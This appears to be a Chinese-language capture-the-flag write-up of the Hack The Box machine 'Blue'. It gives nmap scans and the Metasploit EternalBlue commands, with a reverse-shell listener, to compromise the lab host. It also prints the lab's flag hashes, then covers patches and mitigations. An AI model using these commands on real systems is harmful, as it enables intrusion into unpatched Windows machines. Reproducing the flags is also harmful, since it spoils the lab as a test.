[Meachines] [Easy] Blue MS17-010永恒之蓝
字数 1167 2025-08-20 18:18:40
MS17-010永恒之蓝漏洞利用教学文档
1. 漏洞概述
MS17-010(永恒之蓝)是Microsoft Windows SMB服务中的一个严重远程代码执行漏洞,影响Windows 7、Windows Server 2008等操作系统。该漏洞允许攻击者通过特制的SMB数据包在目标系统上执行任意代码。
2. 信息收集阶段
2.1 初始扫描
使用Nmap进行全端口扫描:
nmap -p- 10.10.10.40 --min-rate 1000 -sC -sV
2.2 扫描结果分析
关键发现:
- 开放端口:
- 135/tcp (msrpc)
- 139/tcp (netbios-ssn)
- 445/tcp (microsoft-ds)
- 49152-49157/tcp (msrpc)
- 操作系统:Windows 7 Professional 7601 Service Pack 1
- 计算机名:HARIS-PC
- 工作组:WORKGROUP
- SMB安全模式:消息签名启用但不强制(漏洞利用关键点)
2.3 漏洞验证扫描
nmap -p 445 -sC -sV --script vuln 10.10.10.40
3. 漏洞利用
3.1 Metasploit框架使用
启动Metasploit:
msfconsole
3.2 选择利用模块
use windows/smb/ms17_010_eternalblue
3.3 配置参数
set RHOSTS 10.10.10.40 # 设置目标IP
set LHOST 10.10.16.24 # 设置本地监听IP
set target 1 # 设置目标类型(自动检测)
3.4 执行攻击
run
4. 后渗透阶段
成功利用后可以获取:
- 用户标志:66feec35142136aa33d265ca07d7859d
- 系统标志:ff8a181bed42f9b18b49ba5690c86cd6
5. 技术细节
5.1 漏洞原理
永恒之蓝利用了SMBv1协议在处理特制数据包时的缓冲区溢出漏洞,特别是:
- SMBv1中的SMB_COM_TRANSACTION2命令处理
- 内核模式驱动srv.sys中的漏洞
- 允许远程代码执行无需用户认证
5.2 利用条件
- 目标系统开启SMB服务(端口445)
- 目标系统未安装MS17-010补丁
- 目标系统未启用SMB签名强制(默认不强制)
6. 防御措施
6.1 补丁管理
安装Microsoft官方补丁:
- KB4012212 (2017年3月安全更新)
- KB4012215 (2017年3月安全更新)
6.2 缓解措施
- 禁用SMBv1:
Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol - 启用SMB签名:
Set-SmbServerConfiguration -RequireSecuritySignature $true - 防火墙规则阻止445端口外部访问
7. 扩展知识
7.1 替代利用工具
- EternalBlue独立利用脚本
- Metasploit的auxiliary/scanner/smb/smb_ms17_010模块(仅检测)
- Python实现的独立利用脚本
7.2 相关漏洞
- MS17-010系列中的其他漏洞(如EternalRomance、EternalChampion等)
- DoublePulsar后门(常与永恒之蓝配合使用)
8. 法律与道德声明
本教学文档仅用于合法安全测试和教育目的。未经授权对系统进行渗透测试是违法行为。在实际环境中使用这些技术前,必须获得系统所有者的明确书面授权。